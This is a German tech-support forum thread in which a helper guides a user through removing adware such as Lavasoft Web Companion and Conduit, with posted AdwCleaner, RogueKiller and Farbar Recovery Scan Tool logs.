PUP.Optional.Conduit, C:\USERS\TOM_ADMIN\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\IYJ5BKBT.DEFAULT\PREFS.JS, Ersetzt, 193, 301520, 1.0.33814, , ame, , 5EC0434210134476D036A110840945A2, 8013D1D55EE47F1389225E045FF77B21A2754084E06CD44AA2D2B393E886EBE6

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)
AdwCleaner brachte jedoch folgenden Schirm:
gefundene Elemente: 17 Abbrechen Quarantäne verschieben

In Quarantäne verschieben?

Code:
# -------------------------------
# Malwarebytes AdwCleaner 8.0.8.0
# -------------------------------
# Build:    10-08-2020
# Database: 2020-11-23.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    12-03-2020
# Duration: 00:00:01
# OS:      Windows 10 Pro
# Cleaned:  17
# Failed:  0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted      C:\ProgramData\Application Data\Lavasoft\Web Companion
Deleted      C:\Users\Tom_Admin\AppData\Local\Lavasoft\WEBCOMPANION.EXE_URL_SIQ0LWF3TZGXP2KHFKLLYBK3IDTBEHNG
Deleted      C:\Users\Tom_Admin\AppData\Roaming\Lavasoft\Web Companion

***** [ Files ] *****

Deleted      C:\Users\Tom_Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iyj5bkbt.default\searchplugins\bing-lavasoft.xml

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted      HKCU\Software\Conduit
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted      HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Updater
Deleted      HKLM\System\Setup\FirstBoot\Services\WCAssistantService
Deleted      HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted      HKU\.DEFAULT\Software\Mozilla\NativeMessagingHosts\com.webcompanion.native
Deleted      HKU\S-1-5-18\SOFTWARE\Mozilla\NativeMessagingHosts\com.webcompanion.native
Deleted      HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

Deleted      Adaware Secure
Deleted      Adaware Secure
Deleted      Bing Default Search
Deleted      Bing Default Search

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2903 octets] - [03/12/2020 16:37:20]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
Code:
RogueKiller Anti-Malware V14.8.0.0 (x64) [Nov 17 2020] (Free) von Adlice Software
Mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Betriebssystem : Windows 10 (10.0.19041) 64 bits
Gestartet in : Normaler Modus
Benutzer : Tom [Administrator]
Gestartet von : C:\Users\Tom\Desktop\RogueKiller64.exe
Signaturen : 20201203_095755, Treiber : Geladen
Modus : Standard-Scan, Scannen -- Datum : 2020/12/03 16:48:30 (Dauer : 00:05:11)

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozesse ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Prozessmodule ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dienste ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts-Datei ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dateien ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Webbrowser ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Anti-Rootkit : 0 (Driver: Geladen) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

M-K-D-B 03.12.2020 19:09
Schritt 1
  • Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
    Code:
    SearchAll: webcompanion;web companion;Conduit;STARTFENSTER;WebDiscoverBrowser
  • Klicke auf den Button Datei-Suche.
  • FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
  • Am Ende wird eine Textdatei Search.txt erstellt.
  • Poste mir deren Inhalt mit deiner nächsten Antwort.





Schritt 2
  • Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Suchlaufs (Search.txt)
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Rupsi 03.12.2020 22:06
Code:
Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (03-12-2020 21:54:30)
Gestartet von C:\Users\Tom\Desktop
Start-Modus: Normal

================== Datei-Suche: "SearchAll: webcompanion;web companion;Conduit;STARTFENSTER;WebDiscoverBrowser" =============

Datei:
========
C:\Windows.old\Windows\Temp\WebCompanion.zip
[2020-04-10 05:39][2020-04-10 05:39] 010513628 _____ () 6B2E5B77802E763A6CB02991251A1D35 [Datei ist nicht signiert]

C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WebCompanion.exe.log
[2020-04-10 05:39][2020-04-10 05:39] 000002520 _____ () 216EE72ADDE20216DA46034D8D2B24B7 [Datei ist nicht signiert]

C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WebCompanionInstaller.exe.log
[2020-04-10 05:39][2020-04-10 05:39] 000002094 _____ () DB183B1C59FDED37672A79D78B89625E [Datei ist nicht signiert]

C:\Windows.old\Users\Tom_Admin\AppData\Local\Temp\WebCompanion.zip
[2019-12-07 20:56][2019-12-07 20:57] 010485224 _____ () 4979CFF5CD2E0809658A2CE21CB1C8A4 [Datei ist nicht signiert]

C:\Windows.old\Users\Tom_Admin\AppData\Local\Temp\VLC Player\startfenster-replace.exe
[2019-08-23 08:30][2019-08-23 08:30] 000122544 _____ () 64587404A913AA248AE8D6F2382D1645 [Datei ist digital signiert]

C:\Windows\Prefetch\WEBCOMPANIONINSTALLER.EXE-B79307C7.pf
[2020-12-02 22:38][2020-12-02 22:38] 000048755 _____ () AA285EA2004B604D6BB896A3D1CDB161 [Datei ist nicht signiert]

C:\Users\Vincent\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\http___webcompanion_com_faq
[2020-11-28 20:27][2020-11-28 20:32] 000037014 _____ () C87B714389307D1A062696B29A89BC87 [Datei ist nicht signiert]

C:\Users\Tom_Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\http___www_startfenster_de_tab__id=_programme_
[2020-12-02 22:08][2020-12-03 16:22] 000037014 _____ () 0862D58B8FAE9AC762FBCD4E69011ACA [Datei ist nicht signiert]

C:\Users\Tom_Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Startfenster-Replace_uninstall_exe
[2020-12-02 22:08][2020-12-03 16:22] 000037014 _____ () 442336CB2AD216CDB37F7E51F637B38D [Datei ist nicht signiert]

C:\Users\Tom_Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WebCompanion.exe.log
[2019-12-07 20:57][2019-12-07 20:57] 000000226 _____ () 43BE79FA8CE9CC56BE4A29A48A6C8FF0 [Datei ist nicht signiert]

C:\Users\Tom_Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WebCompanion.exe.log
[2018-04-26 19:26][2019-12-07 20:57] 000003148 _____ () C889A408B2D385C54A3C30F2CA2A2F73 [Datei ist nicht signiert]

C:\Users\Tom_Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WebCompanionInstaller.exe.log
[2018-04-26 19:26][2019-12-07 20:57] 000002031 _____ () DEBC8140261679410C914C9DB2DE90DD [Datei ist nicht signiert]

C:\Users\Tom\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\http___webcompanion_com_faq
[2020-12-02 21:31][2020-12-02 21:31] 000037014 _____ () C87B714389307D1A062696B29A89BC87 [Datei ist nicht signiert]

C:\Users\Tom\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WebCompanionInstaller.exe.log
[2020-12-02 22:38][2020-12-02 22:38] 000002800 _____ () 8CA58674EC20C165078C88B240FFF3A0 [Datei ist nicht signiert]

C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS32\iSyncConduit.dll
[2020-12-02 20:49][2020-12-02 20:49] 001788728 _____ (Apple Inc.) BD980B1EAFB165941FBD72345E2D5FCB [Datei ist digital signiert]

C:\Program Files\WindowsApps\AppleInc.iTunes_12109.10002.53004.0_x64__nzyj5cx40ttqa\AMDS32\iSyncConduit.dll
[2020-11-08 01:06][2020-11-08 01:06] 001788728 _____ (Apple Inc.) BD980B1EAFB165941FBD72345E2D5FCB [Datei ist digital signiert]

C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS32\iSyncConduit.dll
[2020-05-08 19:14][2020-05-08 19:14] 001788728 _____ (Apple Inc.) D0F0AF9F8328B245F497F4F43B64574F [Datei ist digital signiert]

C:\AdwCleaner\Quarantine\v1\20201203.164340\4\Web Companion\Logs\Webcompanion\webcompanion.log#BB97EE6A0C723DA2
[2017-12-01 23:58][2020-04-10 06:30] 000349073 _____ () BFC57F8D1C109A96722752E4360874F3 [Datei ist nicht signiert]


Ordner:
========
2020-04-10 05:39 - 2020-04-10 05:39 _____ C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Lavasoft\WebCompanion.exe_Url_siq0lwf3tzgxp2khfkllybk3idtbehng
2019-08-23 08:30 - 2020-11-10 10:53 _____ C:\Windows.old\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace
2019-12-07 20:57 - 2020-11-10 10:53 _____ C:\Windows.old\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
2019-12-07 20:57 - 2020-04-10 05:40 _____ C:\AdwCleaner\Quarantine\v1\20201203.164340\5\WEBCOMPANION.EXE_URL_SIQ0LWF3TZGXP2KHFKLLYBK3IDTBEHNG
2017-12-01 23:58 - 2017-12-01 23:58 _____ C:\AdwCleaner\Quarantine\v1\20201203.164340\4\Web Companion
2017-12-01 23:58 - 2020-12-03 16:43 _____ C:\AdwCleaner\Quarantine\v1\20201203.164340\4\Web Companion\Logs\Webcompanion
2019-12-07 20:57 - 2019-12-07 20:57 _____ C:\AdwCleaner\Quarantine\v1\20201203.164340\3\Web Companion

Registry:
========

===================== Suchergebnis für "webcompanion" ==========

[HKEY_USERS\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe"="0x5341435001000000000000000700000028000000581A060098BD060001000000000000000000000A0021000050BB64EDDDACD50100000000000000000200000028000000000000000000004000000000000000000000000000000000B6350000000000000100000001000000"


===================== Suchergebnis für "web companion" ==========

[HKEY_USERS\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe"="0x5341435001000000000000000700000028000000581A060098BD060001000000000000000000000A0021000050BB64EDDDACD50100000000000000000200000028000000000000000000004000000000000000000000000000000000B6350000000000000100000001000000"


===================== Suchergebnis für "Conduit" ==========


===================== Suchergebnis für "STARTFENSTER" ==========


===================== Suchergebnis für "WebDiscoverBrowser" ==========


====== Ende von Suche ======

FRST Logfile:
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-12-2020
durchgeführt von Tom (Administrator) auf DESKTOP-HRMFF6U (03-12-2020 22:03:37)
Gestartet von C:\Users\Tom\Desktop
Geladene Profile: Tom
Platform: Windows 10 Pro Version 2004 19041.630 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

() [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\hid.exe
() [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Audible Inc) C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleRT.WindowsPhone.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe <2>
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\CaptureGenPCI.exe
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\HauppaugeTVServer.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <9>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Plex, Inc -> Plex, Inc.) D:\Plex Media Server\Plex Update Service.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe
(Synology Inc. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\Synology\Assistant\UsbClientService.exe
(TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> ) C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe
(Wondershare Technology Co.,Ltd -> Wondershare) D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8899592 2016-08-18] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () [Datei ist nicht signiert]
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3145504 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe [23923520 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] ->
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutoStart IR.lnk [2017-12-10]
ShortcutTarget: AutoStart IR.lnk -> D:\WinTV8\Ir.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status.lnk [2017-12-10]
ShortcutTarget: WinTV Recording Status.lnk -> D:\WinTV8\WinTV8\WinTVTray.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
Startup: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat [2020-06-10] ()

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04CA3909-D69D-43A5-99CA-E4A7DB045E6B} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {0EFEBAAC-576E-4762-8997-7B0E494946BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {1017B9C3-45B8-4597-B14C-533C4DD0962B} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {21B90862-E5A8-4513-A6E7-B3318C907E16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {301D3EF3-4629-4E7B-A141-56376012B2D2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {58C39010-E634-4932-82D7-6908617A530B} - System32\Tasks\klcp_update => D:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1179648 2019-05-04] () [Datei ist nicht signiert]
Task: {6650BCCE-E32F-4AA3-8646-656E362AD7AD} - System32\Tasks\Opera GX scheduled Autoupdate 1581624516 => C:\Users\Vincent\AppData\Local\Programs\Opera GX\launcher.exe [1654808 2020-11-09] (Opera Software AS -> Opera Software)
Task: {6AEB12E4-EBBE-49F9-BF52-BA918C8FF8D7} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6EC9D36C-56A9-49EF-80C8-E873D54B79E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {7B618AD2-A374-4448-9922-2761F033DD0E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {89D3A3AF-AA6C-4D9C-B5A9-E8BF31EB742D} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8AE68F17-25F4-4A4B-9F41-2BA2C9A23871} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [695664 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8F1D618A-832E-4B10-8203-742394F9E334} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {93034433-CC5F-470F-A985-B27BCA73C2CE} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2020-09-21] (Garmin International, Inc. -> )
Task: {94CBBC10-AAB9-4C2C-A6B3-12E2A6895D7B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {A34D82CB-2F6B-44C9-807F-C038448DD629} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {AB419D69-ABC8-46B7-8635-373A19889BA4} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {BF858A89-C229-4458-B2F5-558835BA4A14} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {DB6AEEDB-4855-4BEB-9E27-295F36EF6FF0} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-24] (Mozilla Corporation -> Mozilla Foundation)
Task: {DE716A61-2033-4009-AB31-EB3368A9D735} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {E6A8E65B-E786-46B7-8EE4-6BBF1BB5548B} - System32\Tasks\Intel PTT EK Recertification => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe [918288 2020-04-22] (Intel(R) Trust Services -> Intel(R) Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Intel PTT EK Recertification.job => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{63218f78-6517-4416-a1f6-e54ff6d4ebb1}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{8614a304-0d06-47f8-ae57-178008927bf3}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{e7f632ab-1108-4f8c-ac4e-4975ffc27554}: [DhcpNameServer] 192.168.42.129

Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Tom\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
Edge DownloadDir: H:\Download
Edge StartupUrls: Default -> "hxxp://startpage.de/"
Edge DefaultSearchURL: Default -> hxxp://startpage.de
Edge DefaultSearchKeyword: Default -> startpage

FireFox:
========
FF DefaultProfile: 4eks1494.default
FF ProfilePath: C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default [2020-12-03]
FF DownloadDir: H:\Download
FF Homepage: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.startpage.com/do/mypage.pl?prfe=67d6f7efcd45238dc5da976ba89cf2c1761002405484af240c1c89932309a9bc682f42f8e95b43a819e717eb408e8de7
FF Notifications: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.alibaba.com; hxxps://support.gearbest.com
FF Extension: (convert2mp3.net Online Video Converter) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\info@convert2mp3.net.xpi [2018-02-19]
FF Extension: (uBlock Origin) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\uBlock0@raymondhill.net.xpi [2020-12-02]
FF Extension: (Startpage.com — Datenschutz-Suchmaschine) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{20fc2e06-e3e4-4b2b-812b-ab431220cada}.xpi [2019-10-12]
